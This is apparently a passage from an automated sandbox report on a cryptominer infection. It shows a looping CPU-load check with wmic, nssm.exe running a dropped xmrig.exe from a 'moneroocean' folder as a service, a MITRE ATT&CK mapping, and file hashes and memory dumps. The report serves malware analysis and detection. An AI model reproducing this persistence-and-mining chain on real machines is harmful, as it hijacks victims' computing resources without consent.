    wmic cpu get loadpercentage
    3⤵
    PID:1800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:68
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:96
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4692
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4502b703d9f95c855690fa33072aa122

SHA1
0f1ecf9a1266e65fe6cddbf471eaadbd8e68adb2

SHA256
1a9355771e4b09be266b2fdee5719bb48f48e9b3ed5382ef119b841ed622c778

SHA512
42c127e204e5c3a76352cba9b1c537f31521daa2c1d192c14355022218b77b99c6a02177f512319f2de07bc18d0101605cb66787b0592133b8acaa4199fd2e04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a802df58c713c0767b82d0905228a6b6

SHA1
83ee90a41ecabddb6e38067ec99ba0c037fb010b

SHA256
592aa29787df67de12ee119e0e289ed827ce409e6fb9dd8cf7293ff686f8b8da

SHA512
45466ffbf32a992ce1593bdab15a800b8a516a14e23dbad8743410e07dbe561e57593af23034075bd7de8d58ffc5ce23447f354a905d75cd06fc19ba9da55121

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17384fb357e07cfd10465c173b9a7602

SHA1
822bcda9c8aea5e04607b2bde6e145eccc1aebee

SHA256
a3ce2c6a4d0f96c20ac59e88cd240e3ad769e15cd01eb15d23fb242b63822687

SHA512
a860cfcf1cf9f4e4ab8af2230e04dcc8ebf80481d0484a2a6eb9efd7c6acb5e58b121925f9c56826d9b6de994295dbc5ed350b090858a439f342557f891e3b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eab4b0a7b46288bbead1987810f559cf

SHA1
61630b4f8c415d46ca3466701eac44a03a46d5c0

SHA256
870a717fb15246e1e0f388df9e5739a222fae5a2e317286b96ada93b54db68de

SHA512
53d8305ed68936e972748cb1100b94e072855f283303c31cff41cb8727dde85f8a0cd914159c7e0e463a46c5c3ec5a67e4063aa463337d0758d72443ffe26ca0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f1d931d85b16c9c03ebc4bee53314460

SHA1
728dac31466a6d5dd082b5b8f58173b3c147d2e1

SHA256
22a133dfefeae950d481f9c540d7419b0a9e27a3b541b59f33aa51c7df8e5427

SHA512
b8f22787631ece38ff216475576f5a3f7d8a358980ca7df8143124acbc9b8cd64cfb2f3ab2a2a2df5e7a7583d8952f6ba38b42500517d02d917d359df33d5b93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b970f40f95ac1aa7a0c55e4925d413ed

SHA1
d0340c829537798d64a35c3cf9badd2d732d5a02

SHA256
a6732605e57b188fc8380016d053d3c221aeb44d140523a497d0bf24c0b98334

SHA512
2a9c3526eacccc1252fe6889c3b54f7a35fa8d3fa4d02d891c34f77d16266bac033e40283320a6f0082f457160ba1a11bf3b1b13165a34df58880019004e57b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1f317f60d14e5bd5580853a3aaf63b4f

SHA1
25cffdb862803ac045c1349290e9d2ba20a3e455

SHA256
6133d434543b5d7c4201ad9a60300b13b9ff14a2f2e6d54f1a52b40044c09adc

SHA512
239015d460b16fad937f8a166492cbb912bdd843296bc0132622d5e645d74d054f027a7f94a3021f1e5e16fc80bf2e9480a01d340727a917b51df5d69eb72cbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bc2823b0bfea503eac64d4cad60efa3f

SHA1
6accf4ab3d25954931c37a422c28831039845472

SHA256
36c9e524c22263639d215cf4f78ba85120283fb302f731519520f73e6783d772

SHA512
0f999e2bad582923b267adc847f8c4dcd596868b639d7dafe8d3bd8859882bfeeaba350fa2b6a31c0787cfdb5a1b8bb80782cd68e63d479ce02d19374d5e17a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
960ce92dc435e119c7f9d9355469b0de

SHA1
ae9f74209777c615931224ffdd0908ffb03ad041

SHA256
0df7303f46e0bcbb1c1275e47610eef11cea78eb4771003425d9f5cadce0375c

SHA512
f2feaaa178661763c787b83a2a53e30d2e51fab51455c191dd14db564fc90cc579cba6bd112e9d29676d091437bba1a440997c017ad11f9b1b307f042cd8525c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1437206b0d8b4397d222f2fc0d43cd5

SHA1
b7309dc0c36323739e0729fae49fe5adff488666

SHA256
ab30f307731b57c98a55c9557679d41527e98f79e70c8da1cfed9c10a7c17fd2

SHA512
74642d1e6e949b7884cc1667a50cb4daa85daf6336be53351683c2aecf486e61096fb03ead91505485af7fba3052bb0fa5241dcb042635ae914309e597ec71ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4c28fecc49421c3250244d1b9fb3ae62

SHA1
0321203d1d22522dbcd114caa2ab8560ad968531

SHA256
787c5a72a96c918709ead89c828fb25d4ca55a0c56d891f0c062bd7a503f3d81

SHA512
47ad69903b76c09a31305f2fe7bb2d2b17cd9d553ea151c07c4be66bdebc21c25a3ce77eca00e379684e8b8c9d54af9e08d131365363e6c9bf7405b705e06701

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
efcb7e54ac5fae8b4a9faf720d4a19f9

SHA1
ac7c4b5b9988934ac47004d805ccb866ce1c2565

SHA256
12d9271492b28e37b773ca3e15d951388680d00b4f6bee6d7e65ac4cd5af59c4

SHA512
5ce9a001f950755032065b654c9aeb85521948c8969f709a9de8cbb1e02d91882de9a344d718580de5520f0f6b92ff6050ce65ebaf289d290aa27b587ff7fd10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axpefba2.mn1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp707D.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
fc2ad9ad97fa1c095daaff963e7e0629

SHA1
1558017e4ac852742c9a58b40b15db8e55580d28

SHA256
4edadba0cb7822066fbc0205e42db16bcc99dcf1b29f63ad09b4cfb8317e11e1

SHA512
503d1dd435b17cf8b655160d4ff7b3a1d19578436bc971640305a432d42dc9e4c7c1040a921e8a2bdd639698d5883fe3bdc99d05df331c04d8b0b613e1c3c837

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
b8d25cb822e16c12dd3c3f8e624c6e51

SHA1
020fb2ca53b3278ee401cb0eb37a6058a49e639f

SHA256
eb569ae8c103bc3adf6d1735966431a8c0c6e019679ec9f56f6c9942015f3fca

SHA512
d5d93a8319df6abcc39b320dfcd1e29a1b10f0bfdad374200dc93216ddb9fd61a9f409e82b9411d3814ae4dceada5f14dd352bf83c0c2449a1082152d6a481ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
cd4622b57763eed6fd33f018b8c93d29

SHA1
47f1608be1968cee1f066f1eb0982697a133e435

SHA256
06ac9f155173b2b3ccc214fd7b4f5b483cbad4152294f7b0550b5983a384e3f0

SHA512
4ac793496092ef8909a12aed0dbd79bc0d4ff48ca3c1b7a2d52dc7d5052993d0c1e0fa1855657a4caa85be84861561ead7c5f3e50090f4628a7d3797db8ec809

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/96-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

Filesize
9.9MB

Download
memory/96-26-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

Filesize
9.9MB

Download
memory/96-3-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp

Filesize
4KB

Download
memory/96-9-0x00000194A1210000-0x00000194A1286000-memory.dmp

Filesize
472KB

Download
memory/96-7-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

Filesize
9.9MB

Download
memory/96-5-0x0000019488D90000-0x0000019488DB2000-memory.dmp

Filesize
136KB

Download
memory/96-424-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

Filesize
9.9MB

Download
memory/1120-135-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1120-134-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/2596-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-454-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-486-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-439-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-440-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-441-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-442-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-443-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-444-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-445-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-446-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-447-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-448-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-449-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-450-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-451-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-452-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-453-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-485-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-455-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-456-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-457-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-458-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-460-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-461-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2596-462-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
